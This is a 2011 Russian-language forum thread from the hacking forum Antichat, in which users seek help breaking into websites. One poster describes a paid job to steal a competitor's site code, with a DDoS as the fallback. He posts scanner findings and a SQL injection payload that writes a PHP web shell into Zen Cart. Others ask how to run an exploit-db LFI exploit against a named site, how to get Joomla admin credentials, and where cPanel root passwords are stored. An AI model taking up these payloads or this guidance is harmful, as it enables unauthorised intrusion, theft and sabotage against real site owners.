ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

29.07.2011, 01:57
|
|
Новичок
Регистрация: 14.06.2007
Сообщений: 5
Провел на форуме: 3534
Репутация:
0
|
|
Подскажите какой движок используется сайтом cwars.ru.
П.С.
сорри если не в той теме вопрос задал, не как не мог найти подходящую тему.
|
|
|

29.07.2011, 02:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 74780
Репутация:
33
|
|
Сообщение от Dima282
Dima282 said:
Подскажите какой движок используется сайтом cwars.ru.
П.С.
сорри если не в той теме вопрос задал, не как не мог найти подходящую тему.
WordPress
|
|
|
|

29.07.2011, 05:58
|
|
Новичок
Регистрация: 14.06.2007
Сообщений: 5
Провел на форуме: 3534
Репутация:
0
|
|
Сообщение от brain
brain said:
WordPress
С чего ты взял что он на ВП? Не каких признаков вп там не нашел
|
|
|

29.07.2011, 10:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 2733
Репутация:
0
|
|
Мужики, в общем дело такое: пришёл заказ. Сабж не указываю по понятным причинам. Задача-достать движок, который разумеется конкурент конкуренту не продаст. Коммерсанты херовы, млин. Если не получится достать движ-то ДДоС. Ну ладно, полез просто посмотреть, хоть и не совсем мой профиль, но расти-то надо всегда. С БТ дружу понемногу, но начал с SSS на винде. Он мне дал следующее:
1 CGI Scripts : Zen Cart Multiple File Include Vulnerabilities
Порт 80
Описание Zen Cart is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.An attacker can exploit these issues to include arbitrary remote and local files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.These issues affect version 1.3.0.2 and prior; other versions may also be vulnerable.
Как исправить Upgrading to the most recent version of Zen Cart.
Уровень риска Высокий
Ссылки Zen Cart Homepage
Скрипт http://subj.ru/index.php?
CVE CVE-MAP-NOMATCH
Bugtraq ID 19543
.............
2 Mail Servers : SMTP without AuthLogin
Порт 2500
Описание An SMTP service supports SMTP without AuthLogin.
Как исправить Install authlogin.
Уровень риска Низкий
.............
3 Web Servers : The list of E-Mail
Порт 80
Описание Found E-Mail on web site
Уровень риска Информационный
E-Mail //mail@subj.ru/
CVE GENERIC-MAP-NOMATCH
............
Всё в степени от высокого до низкого. Ну, думаю, делать нечего-полез в сеть по "красному коду", хоть и понимаю, что "боян". Ачат курил и курю, вот тут по вопросу о Zen Cart нашел у г-на DIAgen'а следующее:
1
Код HTML:
HTML:
admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0
, на что сабж ответил:
Код HTML:
HTML:
Not Found The requested URL /admin/password_forgotten.php POST admin_email='UNION+SELECT+0,0,'',0 was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
.
После апробации второго варианта воздействия а-ля
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]INTO[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]OUTFILE[/COLOR][COLOR="#007700"]+%[/COLOR][COLOR="#0000BB"]27shell[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]force_table_err[/COLOR][COLOR="#007700"]or%[/COLOR][COLOR="#0000BB"]2F[/COLOR][COLOR="#007700"]*&[/COLOR][COLOR="#0000BB"]submit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]resend[/COLOR][/COLOR]
мне сабжем было сказано:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]Not Found The requested URL[/COLOR][COLOR="#007700"]/+[/COLOR][COLOR="#0000BB"]INTO[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]OUTFILE[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#DD0000"]'shell.php'[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]force_table_err[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#FF8000"]/*&submit=resend was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.[/COLOR][/COLOR]
. Я подумал, что мб ошибся и дал ему всё одной строкой, на что получил
PHP код:
PHP: [COLOR="#000000"]Not Found The requested URL /admin/password_forgotten.php POST admin_email='UNION+SELECT+0,0,'[COLOR="#0000BB"][/COLOR]',0 +INTO+OUTFILE+'shell.php'+FROM+force_table_err or/*&submit=resend was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.[/COLOR]
. В общем, я "интуитивно догадываюсь" (с), что нужно по уму лезть в линь, и собирать "пальцы" оси и тд, но согласитесь это не имеет смысла, учитывая что не умеешь эксплуатировать уязвимость. Я в состоянии запустить nmap или любой другой сканер, и собрать эту информацию, но без адвайза это делу не поможет, согласитесь. Я всё же больше по выпечке, хоть и хочется расти над собой.
Так как я не любитель получать всё "искаропки" и не школоло, которому вечно нужна кнопка взлома интернета прошу указания\совета\какие данные мне нужно собрать о сабже, чтобы двигаться дальше, либо какими утилитами эксплуатировать сабж. Имею свой домен, возможность поставить шелл есть. Подписался не столько за деньги, сколько за опыт, чего и вам желаю. Набившего оскомину "заранее спасибо" писать не буду, но буду благодарен за любое указание верного направления, т.к. помощь требуется в основном в том, какова последовательность шагов и утилит, назовем это так.
|
|
|
|

30.08.2011, 14:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Подскажите, как подключиться к базе данных сайта, зная ее имя, логин и пароль пользователя? Шелла на сайте нет, соответственно по localhost - не получается. Судя по хостингу - используется DirectAdmin. Не пойму, какой порт писать для подключения к Mysql.
|
|
|
|

04.09.2011, 20:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 1318
Репутация:
0
|
|
Exploit
у меня вопрос что дальше делать?(хочу использовать експлоит)
Microsoft Windows [Version 6.1.7601]
(c) Корпорац?я Майкрософт (Microsoft Corporation), 2009. Ус? права захищено.
C:\Users\User>php -v
PHP 5.2.17 (cli) (built: Jan 6 2011 17:28:41)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies
C:\Users\User>php C:\Users\User\Desktop\11263.php
################################################## #######################
# LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)
# Date: 27.08.2009
################################################## #######################
usage: php C:\Users\User\Desktop\11263.php host path file [port] [debug]
example: php C:\Users\User\Desktop\11263.php localhost /j1512 ../../../../../../
../../wamp/www/j1512/images/stories/duck.jpg 80 1
C:\Users\User>
Хочу использовать например вот етот експлоит -http://www.exploit-db.com/exploits/11263/-для сайта www.сайт.it.( что для этого надо?)експлоит на пхп интерпретатор пхп скачал запустил через сmd что дальше делать?
где и что вписывать или я что то не так делаю?
и еще сайт на joomla 1.5 может кто подскажет как получить доступ к админке те логин и пароль?( извините за глупый вопрос я новичок)
|
|
|
|

09.09.2011, 17:33
|
|
Новичок
Регистрация: 08.02.2006
Сообщений: 19
Провел на форуме: 86384
Репутация:
5
|
|
Сообщение от Жопорук
Жопорук said:
Подскажите, как подключиться к базе данных сайта, зная ее имя, логин и пароль пользователя? Шелла на сайте нет, соответственно по localhost - не получается. Судя по хостингу - используется DirectAdmin. Не пойму, какой порт писать для подключения к Mysql.
на любом нормальном хостинге доступ к базе данных разрешен только с localhost, а возможность удаленного доступа настраивается отдельно, причем чаще всего разрешение дается на определенную подсеть или ip. порт mysql по умолчанию - 3306.
Сообщение от None
у меня вопрос что дальше делать?(хочу использовать експлоит)
попробуйте написать какой-нибудь простой скрипт на пхп по любому учебнику. который, например, подключался бы к mysql, и умел читать и записывать туда данные. тогда вопросы что делать со скриптом-эксплоитом отпадут. это самый быстрый способ. ну и вот тут вам показали как использовать скрипт (строка usage) и дали пример (строка example)
Код:
Code:
C:\Users\User>php C:\Users\User\Desktop\11263.php
usage: php C:\Users\User\Desktop\11263.php host path file [port] [debug]
example: php C:\Users\User\Desktop\11263.php localhost /j1512 ../../../../../../
../../wamp/www/j1512/images/stories/duck.jpg 80
|
|
|

09.09.2011, 17:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 9053
Репутация:
0
|
|
ребят, подскажите,есть ли какие уязвимости в Netcat (CMS) желательно для последних версий, но и старые тоже подойдут
|
|
|
|

14.09.2011, 16:17
|
|
Познающий
Регистрация: 27.11.2008
Сообщений: 86
Провел на форуме: 264957
Репутация:
8
|
|
Подскажите где хранятся пароли от cpanel в том числе рутовый
|
|
|

19.09.2011, 02:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 756
Репутация:
0
|
|
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|